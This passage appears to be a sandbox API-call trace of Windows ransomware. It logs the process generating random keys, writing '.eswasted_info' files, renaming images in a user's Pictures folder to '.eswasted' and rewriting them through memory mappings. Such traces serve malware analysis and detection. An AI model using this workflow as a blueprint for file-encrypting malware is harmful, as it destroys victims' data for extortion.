lpString1=".eswasted_info") returned=".eswasted_info" [0079.335] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.335] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.336] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.336] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2CoPk.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2copk.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.337] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.337] SetEndOfFile (hFile=0x130) returned 1 [0079.338] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.338] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.338] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2CoPk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2copk.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2CoPk.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2copk.gif.eswasted")) returned 1 [0079.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2CoPk.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2copk.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.338] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.340] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.341] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.341] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.341] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.342] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.342] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.351] SetEndOfFile (hFile=0x130) returned 1 [0079.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.353] CloseHandle (hObject=0x130) returned 1 [0079.354] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.355] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.355] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.355] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4AlUgKm3N88x.gif") returned 59 [0079.355] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x280) returned 0x71ec18 [0079.356] lstrcpyW (in: lpString1=0x71ec8e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.356] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.356] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.356] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.356] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4AlUgKm3N88x.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4alugkm3n88x.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.357] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.358] SetEndOfFile (hFile=0x130) returned 1 [0079.358] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.358] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.358] lstrcpyW (in: lpString1=0x71ec8e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4AlUgKm3N88x.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4alugkm3n88x.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4AlUgKm3N88x.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4alugkm3n88x.gif.eswasted")) returned 1 [0079.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4AlUgKm3N88x.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\4alugkm3n88x.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.359] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.409] CryptAcquireContextW (phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040) [0079.410] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.410] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.410] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.411] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.411] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.411] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.420] SetEndOfFile (hFile=0x130) returned 1 [0079.422] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.422] CloseHandle (hObject=0x130) returned 1 [0079.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.424] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.425] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.425] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.425] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\brtUjg4_5.gif") returned 56 [0079.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27a) returned 0x71ec18 [0079.425] lstrcpyW (in: lpString1=0x71ec88, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.425] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.425] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.426] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.426] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\brtUjg4_5.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\brtujg4_5.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.426] WriteFile (in: hFile=0x130, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.427] SetEndOfFile (hFile=0x130) returned 1 [0079.428] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.428] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.428] lstrcpyW (in: lpString1=0x71ec88, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\brtUjg4_5.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\brtujg4_5.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\brtUjg4_5.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\brtujg4_5.gif.eswasted")) returned 1 [0079.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\brtUjg4_5.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\brtujg4_5.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.429] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.430] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.431] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.431] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.431] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.432] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.432] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.441] SetEndOfFile (hFile=0x130) returned 1 [0079.443] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.443] CloseHandle (hObject=0x130) returned 1 [0079.445] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.445] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.446] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.446] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.446] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\c1_4G2mEVe.jpg") returned 57 [0079.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x71ec18 [0079.446] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.446] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.446] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.447] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.447] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\c1_4G2mEVe.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c1_4g2meve.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.449] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.450] SetEndOfFile (hFile=0x108) returned 1 [0079.450] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.450] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.450] lstrcpyW (in: lpString1=0x71ec8a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\c1_4G2mEVe.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c1_4g2meve.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\c1_4G2mEVe.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c1_4g2meve.jpg.eswasted")) returned 1 [0079.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\c1_4G2mEVe.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c1_4g2meve.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0079.451] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.453] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.454] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.454] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.454] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.455] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.455] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.464] SetEndOfFile (hFile=0x108) returned 1 [0079.466] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.466] CloseHandle (hObject=0x108) returned 1 [0079.467] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.468] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.468] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.468] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ccj_FxEeYB9AVLD6.jpg") returned 63 [0079.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x71ec18 [0079.469] lstrcpyW (in: lpString1=0x71ec96, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.469] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.469] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.469] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ccj_FxEeYB9AVLD6.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ccj_fxeeyb9avld6.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.470] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.471] SetEndOfFile (hFile=0x108) returned 1 [0079.471] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.471] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.471] lstrcpyW (in: lpString1=0x71ec96, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ccj_FxEeYB9AVLD6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ccj_fxeeyb9avld6.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ccj_FxEeYB9AVLD6.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ccj_fxeeyb9avld6.jpg.eswasted")) returned 1 [0079.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ccj_FxEeYB9AVLD6.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ccj_fxeeyb9avld6.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.472] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0079.474] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.475] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.475] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.475] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.476] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.476] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.484] SetEndOfFile (hFile=0x108) returned 1 [0079.533] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.533] CloseHandle (hObject=0x108) returned 1 [0079.535] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.535] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.536] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.536] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.536] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eGha-qEU8.png") returned 56 [0079.536] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27a) returned 0x71ec18 [0079.536] lstrcpyW (in: lpString1=0x71ec88, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.536] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.536] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.537] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.537] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eGha-qEU8.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\egha-qeu8.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0079.537] WriteFile (in: hFile=0x108, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.538] SetEndOfFile (hFile=0x108) returned 1 [0079.539] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.539] lstrcpyW (in: lpString1=0x71ec88, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.539] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eGha-qEU8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\egha-qeu8.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eGha-qEU8.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\egha-qeu8.png.eswasted")) returned 1 [0079.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eGha-qEU8.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\egha-qeu8.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0079.539] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0079.542] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.542] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0079.542] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.542] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.543] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.543] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.553] SetEndOfFile (hFile=0x108) returned 1 [0079.556] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.556] CloseHandle (hObject=0x108) returned 1 [0079.558] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0079.558] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.559] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.559] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.559] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FOgY.png") returned 51 [0079.560] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x270) returned 0x71ec18 [0079.560] 